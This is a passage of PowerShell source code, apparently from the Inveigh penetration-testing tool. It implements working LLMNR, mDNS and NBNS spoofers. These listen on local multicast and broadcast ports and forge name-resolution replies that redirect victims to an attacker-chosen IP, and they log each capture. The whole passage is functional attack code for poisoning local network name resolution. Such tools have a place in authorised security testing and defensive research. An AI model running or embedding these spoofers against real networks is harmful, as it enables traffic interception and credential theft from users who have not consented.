$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")
}
}
}
}
}
5353
{
if([System.BitConverter]::ToString($payload_bytes) -like '*-00-01-80-01')
{
$UDP_length[0] += 10
$mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)]
$mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
$mDNS_response_data = $mDNS_query_payload_bytes +
0x00,0x01,0x00,0x01 +
$mDNS_TTL_bytes +
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$mDNS_response_packet = 0x14,0xe9 +
$source_port[1,0] +
$UDP_length[1,0] +
0x00,0x00 +
$payload_bytes[0,1] +
0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
$mDNS_response_data
if($mDNS -eq 'Y')
{
if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (
!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QU'))
{
$send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
$send_socket.SendBufferSize = 1024
$destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
$mDNS_response_message = "- response sent"
}
else
{
if($mDNSTypes -notcontains 'QU')
{
$mDNS_response_message = "- disabled mDNS type"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$mDNS_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$mDNS_response_message = "- $source_IP is on ignore list"
}
else
{
$mDNS_response_message = "- not spoofed due to previous capture"
}
}
}
$inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
}
elseif([System.BitConverter]::ToString($payload_bytes) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*')
{
$UDP_length[0] += 4
$mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)]
$mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
$mDNS_response_data = $mDNS_query_payload_bytes +
0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 +
0x00,0x01,0x80,0x01 +
$mDNS_TTL_bytes +
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$mDNS_response_packet = 0x14,0xe9 +
$source_port[1,0] +
$UDP_length[1,0] +
0x00,0x00 +
$payload_bytes[0,1] +
0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
$mDNS_response_data
if($mDNS -eq 'Y')
{
if((!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (
!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($mDNSTypes -contains 'QM'))
{
$send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
$send_socket.SendBufferSize = 1024
$destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
$mDNS_response_message = "- response sent"
}
else
{
if($mDNSTypes -notcontains 'QM')
{
$mDNS_response_message = "- disabled mDNS type"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$mDNS_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$mDNS_response_message = "- $source_IP is on ignore list"
}
else
{
$mDNS_response_message = "- not spoofed due to previous capture"
}
}
}
$inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
}
}
5355
{
if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length - 3)]) -ne '00-1c')
{
$UDP_length[0] += $payload_bytes.Length - 2
$LLMNR_response_data = $payload_bytes[12..$payload_bytes.Length]
$LLMNR_response_data += $LLMNR_response_data +
$LLMNR_TTL_bytes +
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$LLMNR_response_packet = 0x14,0xeb +
$source_port[1,0] +
$UDP_length[1,0] +
0x00,0x00 +
$payload_bytes[0,1] +
0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
$LLMNR_response_data
$LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
$LLMNR_query = $LLMNR_query -replace "-00",""
if($LLMNR_query.Length -eq 2)
{
$LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16)
$LLMNR_query_string = New-Object System.String($LLMNR_query)
}
else
{
$LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
}
$LLMNR_request_ignore = $false
if($LLMNR -eq 'Y')
{
if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $LLMNR_query_string -and $source_IP -ne $IP)
{
if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"})))
{
$LLMNR_learning_queue_time = [DateTime]$LLMNR_learning_log.Find({param($s) $s -like "20* $LLMNR_query_string"}).SubString(0,19)
if((Get-Date) -ge $LLMNR_learning_queue_time.AddMinutes($SpooferLearningInterval))
{
$LLMNR_learning_log.RemoveAt($LLMNR_learning_log.FindIndex({param($s) $s -like "20* $LLMNR_query_string"}))
$LLMNR_learning_send = $true
}
else
{
$LLMNR_learning_send = $false
}
}
else
{
$LLMNR_learning_send = $true
}
if($LLMNR_learning_send)
{
$LLMNR_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
$LLMNR_transaction_ID_bytes = $LLMNR_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$LLMNR_transaction_ID = $LLMNR_transaction_ID -replace " ","-"
$LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient
$LLMNR_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)]
$LLMNR_request_packet = $LLMNR_transaction_ID_bytes +
0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00 +
($LLMNR_hostname_bytes.Length - 1) +
$LLMNR_hostname_bytes +
0x00,0x01,0x00,0x01
$LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355)
$LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint)
$LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length)
$LLMNR_UDP_client.Close()
$LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string")
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")
}
}
}
if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and (
$SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
{
if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp )
$LLMNR_send_socket.SendBufferSize = 1024
$LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
$LLMNR_send_socket.Close()
$LLMNR_response_message = "- response sent"
}
else
{
$LLMNR_request_ignore = $true
}
}
else
{
if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
{
$LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
{
$LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$LLMNR_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$LLMNR_response_message = "- $source_IP is on ignore list"
}
elseif($inveigh.valid_host_list -contains $LLMNR_query_string)
{
$LLMNR_response_message = "- $LLMNR_query_string is a valid host"
}
elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
{
$LLMNR_response_message = "- previous capture from $source_IP"
}
elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
{
$LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
}
else
{
$LLMNR_response_message = "- something went wrong"
}
}
}
if(!$LLMNR_request_ignore)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
}
}
}
}
}
switch($endpoint_source_port)
{
5355
{
if($SpooferLearning -eq 'Y' -and $LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes[12] + 13)])
$LLMNR_query = $LLMNR_query -replace "-00",""
if($LLMNR_query.Length -eq 2)
{
$LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16)
$LLMNR_query_string = New-Object System.String($LLMNR_query)
}
else
{
$LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length)
}
[Byte[]]$LLMNR_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)]
$LLMNR_response_IP = [System.Net.IPAddress]$LLMNR_response_IP_bytes
$LLMNR_response_IP = $LLMNR_response_IP.IPAddressToString
if($inveigh.valid_host_list -notcontains $LLMNR_query_string)
{
$inveigh.valid_host_list.Add($LLMNR_query_string)
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")
}
}
}
}
}
}
}
}
$binary_reader.Close()
$memory_stream.Dispose()
$memory_stream.Close()
}
$LLMNR_spoofer_scriptblock =
{
param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL)
$LLMNR_running = $true
$LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355)
try
{
$LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355
}
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
$LLMNR_running = $false
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
}
}
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
[Array]::Reverse($LLMNR_TTL_bytes)
while($inveigh.running -and $LLMNR_running)
{
try
{
$LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint)
}
catch
{
$LLMNR_UDP_client.Close()
$LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
}
if($LLMNR_request_data -and [System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c')
{
$LLMNR_response_packet = $LLMNR_request_data[0,1] +
0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
$LLMNR_request_data[12..$LLMNR_request_data.Length] +
$LLMNR_request_data[12..$LLMNR_request_data.Length] +
$LLMNR_TTL_bytes +
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)])
$source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
if(!$Inspect -and ($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
{
$LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port)
$LLMNR_UDP_client.Connect($LLMNR_destination_endpoint)
$LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
$LLMNR_UDP_client.Close()
$LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
$LLMNR_response_message = "- response sent"
}
else
{
if($Inspect)
{
$LLMNR_response_message = "- inspect only"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
{
$LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
{
$LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$LLMNR_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$LLMNR_response_message = "- $source_IP is on ignore list"
}
elseif($inveigh.IP_capture_list -contains $source_IP)
{
$LLMNR_response_message = "- previous capture from $source_IP"
}
else
{
$LLMNR_response_message = "- something went wrong"
}
}
if($LLMNR_request_data)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
}
}
$LLMNR_request_data = ""
}
}
$LLMNR_UDP_client.Close()
}
$mDNS_spoofer_scriptblock =
{
param ($Inspect,$mDNS_response_message,$mDNSTTL,$mDNSTypes,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore)
$mDNS_running = $true
$mDNS_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5353)
try
{
$mDNS_UDP_client = New-Object System.Net.Sockets.UdpClient 5353
}
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
$mDNS_running = $false
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
}
}
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
$mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL)
[Array]::Reverse($mDNS_TTL_bytes)
while($inveigh.running -and $mDNS_running)
{
try
{
$mDNS_request_data = $mDNS_UDP_client.Receive([Ref]$mDNS_listener_endpoint)
}
catch
{
$mDNS_UDP_client.Close()
$mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
}
if([System.BitConverter]::ToString($mDNS_request_data) -like '*-00-01-80-01')
{
$mDNS_response_packet = $mDNS_request_data[0,1] +
0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
$mDNS_request_data[12..($mDNS_request_data.Length - 5)] +
0x00,0x01,0x00,0x01 +
$mDNS_TTL_bytes +
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$mDNSTypes -contains 'QU') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
{
$mDNS_destination_endpoint = New-Object Net.IPEndpoint($mDNS_listener_endpoint.Address,$mDNS_listener_endpoint.Port)
$mDNS_UDP_client.Connect($mDNS_destination_endpoint)
$mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length)
$mDNS_UDP_client.Close()
$mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
$mDNS_response_message = "- response sent"
}
else
{
if($Inspect)
{
$mDNS_response_message = "- inspect only"
}
elseif($mDNSTypes -notcontains 'QU')
{
$mDNS_response_message = "- disabled mDNS type"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$mDNS_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$mDNS_response_message = "- $source_IP is on ignore list"
}
elseif($inveigh.IP_capture_list -contains $source_IP)
{
$mDNS_response_message = "- previous capture from $source_IP"
}
else
{
$mDNS_response_message = "- something went wrong"
}
}
if($mDNS_request_data)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
}
$mDNS_request_data = ""
}
elseif([System.BitConverter]::ToString($mDNS_request_data) -like '*-05-6C-6F-63-61-6C-00-00-01-00-01-*')
{
$mDNS_response_packet = $mDNS_request_data[0,1] +
0x84,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00 +
$mDNS_request_data[12..($mDNS_request_data[12] + 12)] +
0x05,0x6c,0x6f,0x63,0x61,0x6c,0x00 +
0x00,0x01,0x00,0x01 +
$mDNS_TTL_bytes +
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
$mDNSTypes -contains 'QM') -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
{
$mDNS_destination_endpoint = New-Object Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
$mDNS_UDP_client.Connect($mDNS_destination_endpoint)
$mDNS_UDP_client.Send($mDNS_response_packet,$mDNS_response_packet.Length)
$mDNS_UDP_client.Close()
$mDNS_UDP_client = new-Object System.Net.Sockets.UdpClient 5353
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
$mDNS_response_message = "- response sent"
}
else
{
if($Inspect)
{
$mDNS_response_message = "- inspect only"
}
elseif($mDNSTypes -notcontains 'QM')
{
$mDNS_response_message = "- disabled mDNS type"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
{
$mDNS_response_message = "- $mDNS_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$mDNS_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$mDNS_response_message = "- $source_IP is on ignore list"
}
elseif($inveigh.IP_capture_list -contains $source_IP)
{
$mDNS_response_message = "- previous capture from $source_IP"
}
else
{
$mDNS_response_message = "- something went wrong"
}
}
if($mDNS_request_data)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
}
}
$mDNS_request_data = ""
}
}
$mDNS_UDP_client.Close()
}
$NBNS_spoofer_scriptblock =
{
param ($Inspect,$NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL)
$NBNS_running = $true
$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
try
{
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
}
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
$NBNS_running = $false
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
}
}
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
while($inveigh.running -and $NBNS_running)
{
try
{
$NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
}
catch
{
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
}
$IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
if($NBNS_request_data -and [System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01')
{
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
$NBNS_response_packet = $NBNS_request_data[0,1] +
0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
$NBNS_request_data[13..$NBNS_request_data.Length] +
$NBNS_TTL_bytes +
0x00,0x06,0x00,0x00 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
0x00,0x00,0x00,0x00
$source_IP = $NBNS_listener_endpoint.Address.IPAddressToString
